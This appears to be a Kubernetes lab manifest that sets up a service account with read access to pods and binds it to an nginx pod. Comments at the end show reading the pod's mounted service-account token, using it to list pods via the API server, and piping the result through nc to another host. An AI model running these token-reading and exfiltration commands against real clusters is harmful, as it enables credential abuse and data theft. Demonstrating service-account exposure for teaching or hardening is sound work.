---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: demo-sa
  namespace: default

---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: demo-role
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list"]

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: demo-role-binding
  namespace: default
subjects:
- kind: ServiceAccount
  name: demo-sa
  namespace: default
roleRef:
  kind: Role
  name: demo-role
  apiGroup: rbac.authorization.k8s.io

---
apiVersion: v1
kind: Pod
metadata:
  name: demo-pod
  namespace: default
spec:
  serviceAccountName: demo-sa
  containers:
  - name: demo-cnt
    image: nginx:latest


# k cluster-info | xurls | head -n 1
# APISERVER=https://192.168.59.207:8443
# CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
# NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
# curl --cacert $CACERT -k -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces/$NAMESPACE/pods

# JSON_DATA=$(curl -s --cacert $CACERT -k -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces/$NAMESPACE/pods)
# echo $JSON_DATA | nc 192.168.59.1 55555
